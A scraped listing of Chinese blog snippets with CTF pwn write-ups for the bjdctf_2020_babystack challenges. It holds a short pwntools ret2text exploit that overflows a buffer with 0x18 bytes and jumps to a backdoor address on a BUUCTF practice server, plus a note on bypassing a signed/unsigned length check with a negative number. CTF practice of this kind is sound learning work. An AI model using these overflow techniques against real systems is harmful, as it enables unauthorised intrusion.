bjdctf_2020_babystack1

2025-01-08 06:13:44

拼音 [ 拼音 ]

pwn | bjdctf_2020_babystack - Mz1 - 博客园

bjdctf_2020_babystack ret2text exp: frompwnimport*importtime context.log_level ='debug'sh = remote('node4.buuoj.cn',27865) p_backdoor =0x00000000004006E6sh.recv() sh.send(b'100\n') sh.recv() payload =0x18*b'm'+ p64(p_backdoor) sh.sendline(payload) sh.interactive() sh.close()...
pwn | bjdctf_2020_babystack2 - Mz1 - 博客园

pwn | bjdctf_2020_babystack2 pwn | bjdctf_2020_babystack2 ret2text 一个整数判断,比较的时候是int,传进read当参数的时候是unsigned int,输入负数就能绕过。然后跳转到后门函数就行了。怪没意思的,直接远程秒了。 exp: frompwnimport* context.log_level ='debug'p = remote('node4.buuoj.cn',28943)...
BUUCTF-bjdctf_2020_babystack writeup_园荐_博客园

BUUCTF-bjdctf_2020_babystack writeup 2021-02-09 17:48 −... KaguyaSaikou 0 290 0x01 Wechall writeup 2019-12-20 15:44 −--- storage:writeup time:2018/4/6 --- # 0x01 Wechall writeup [toc] ## [Limited Access](http://www.wechall.net/challenge/wannabe7331/limited_access/i....